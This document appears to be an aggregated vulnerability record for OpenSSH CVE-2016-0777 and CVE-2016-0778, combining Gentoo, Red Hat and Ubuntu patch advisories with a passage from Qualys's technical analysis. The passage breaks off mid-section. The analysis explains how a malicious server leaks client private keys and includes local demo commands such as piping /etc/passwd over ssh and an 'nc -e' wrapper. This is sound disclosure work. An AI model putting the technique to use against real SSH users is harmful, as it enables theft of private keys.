Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.1_p2 >= 7.1_p2
Description
Qualys have reported two issues in the "roaming" code included in the OpenSSH client, which provides undocumented, experimental support for resuming SSH connections. Users with private keys that are not protected by a passphrase are advised to generate new keys if they have connected to an SSH server they don't fully trust.
Workaround
The issues can be worked around by disabling the roaming code. To do so, add "UseRoaming no" to the SSH client configuration, or specify "-o 'UseRoaming no'" on the command line.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-7.1_p2"
References
[ 1 ] CVE-2016-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777 [ 2 ] CVE-2016-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201601-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security update Advisory ID: RHSA-2016:0043-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html Issue date: 2016-01-14 CVE Names: CVE-2016-0777 CVE-2016-0778 =====================================================================
- Summary:
Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. (CVE-2016-0778)
Red Hat would like to thank Qualys for reporting these issues.
All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
ppc64: openssh-6.6.1p1-23.el7_2.ppc64.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-6.6.1p1-23.el7_2.ppc64.rpm
ppc64le: openssh-6.6.1p1-23.el7_2.ppc64le.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-6.6.1p1-23.el7_2.ppc64le.rpm
s390x: openssh-6.6.1p1-23.el7_2.s390x.rpm openssh-askpass-6.6.1p1-23.el7_2.s390x.rpm openssh-clients-6.6.1p1-23.el7_2.s390x.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-keycat-6.6.1p1-23.el7_2.s390x.rpm openssh-server-6.6.1p1-23.el7_2.s390x.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm
ppc64le: openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm
s390x: openssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-ldap-6.6.1p1-23.el7_2.s390x.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0777 https://access.redhat.com/security/cve/CVE-2016-0778 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/articles/2123781
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
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"data": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================\nUbuntu Security Notice USN-2869-1\nJanuary 14, 2016\n\nopenssh vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nOpenSSH could be made to expose sensitive information over the network. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n openssh-client 1:6.9p1-2ubuntu0.1\n\nUbuntu 15.04:\n openssh-client 1:6.7p1-5ubuntu1.4\n\nUbuntu 14.04 LTS:\n openssh-client 1:6.6p1-2ubuntu2.4\n\nUbuntu 12.04 LTS:\n openssh-client 1:5.9p1-5ubuntu1.8\n\nIn general, a standard system update will make all the necessary changes. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66 if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67 logit(\"Server denied roaming\");\n 68 return;\n 69 }\n 70 verbose(\"Roaming enabled\");\n .. \n 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78 if (size == 0 || size \u003e MAX_ROAMBUF)\n 79 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80 /*\n 81 * The buffer size can only be set once and the buffer will live\n 82 * as long as the session lives. \n 83 */\n 84 if (out_buf == NULL) {\n 85 out_buf_size = size;\n 86 out_buf = xmalloc(size);\n 87 out_start = 0;\n 88 out_last = 0;\n 89 }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201 size_t available, needed;\n202\n203 if (out_start \u003c out_last)\n204 available = out_last - out_start;\n205 else\n206 available = out_buf_size;\n207 needed = write_bytes - *offset;\n208 debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209 (unsigned long)needed, (unsigned long long)*offset);\n210 if (needed \u003e available)\n211 fatal(\"Needed to resend more data than in the cache\");\n212 if (out_last \u003c needed) {\n213 int chunkend = needed - out_last;\n214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215 chunkend);\n216 atomicio(vwrite, fd, out_buf, out_last);\n217 } else {\n218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219 }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n out_start is still equal to 0), and the amount of data available in\n out_buf is indeed \"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n is exactly equal to \"out_last + 1\"), and the amount of data available\n in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n out_buf (and both out_start and out_last are still equal to 0) because\n no data was ever sent to the server after roaming_reply() was called,\n but the client sends (leaks) the entire uninitialized out_buf to the\n server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n and force malloc() to return a previously free()d but uncleansed chunk\n of sensitive information. The simple proof-of-concept in this advisory\n does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n than get_snd_buf_size() are attainable because roaming_reply() does\n not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n wraparound. The proof-of-concept in this advisory attempts to derive\n the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n were actually written by the client to the server (because the server\n controls the \"*offset\" argument, and resend_bytes() does not protect\n \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n a previously free()d chunk of memory that is recycled to malloc()ate\n the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n and both functions properly cleanse the private keys\u0027 memory with\n OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n (old API) or sshbuf_free() (new API), and both functions attempt to\n cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n load_public_identity_files(), which loads the client\u0027s public keys\n with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n (without the \".pub\" suffix) are loaded first and then discarded, but\n nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n by the client\u0027s public-key authentication method) loads a private key\n with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n of this private key may remain uncleansed in memory (a 3K copy in a 4K\n buffer). Fortunately, only the file of a very large RSA key (for\n example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n 256 bytes: if a private-key file is larger than 1K (the size passed to\n read()), a partial copy of this private key may remain uncleansed in\n memory (a 1K copy in a 1K buffer). For example, the file of a\n default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n ssh_connect_direct() method (a simple TCP connection) is called by\n wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424 int sock = -1, attempt;\n 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430 for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470 }\n 471 if (sock != -1)\n 472 break; /* Successful connection. */\n 473 }\n 474\n 475 /* Return failure if we didn\u0027t get a successful connection. */\n 476 if (sock == -1) {\n 477 error(\"ssh: connect to host %s port %s: %s\",\n 478 host, strport, strerror(errno));\n 479 return (-1);\n 480 }\n\n Incidentally, this error() call displays stack memory from the\n uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n client\u0027s stdin and stdout, but these file descriptors are close()d by\n packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n and are never reopened again, making it impossible for the client to\n reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n passes a connected file descriptor back to the client, but it calls\n fatal() while reconnecting to the server, because waitpid() returns\n ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n the first successful connection to the server) calls waitpid() before\n ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789 while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790 (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791 ;\n1792\n1793 signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 121 /* Fork and execute the proxy command. */\n 122 if ((pid = fork()) == 0) {\n ... \n 157 }\n 158 /* Parent. */\n ... \n 167 while (waitpid(pid, NULL, 0) == -1)\n 168 if (errno != EINTR)\n 169 fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n connects the client to the server, but if a disconnection occurs, and\n the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n read() returns EINTR) and the client exit()s before it can reconnect\n to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ 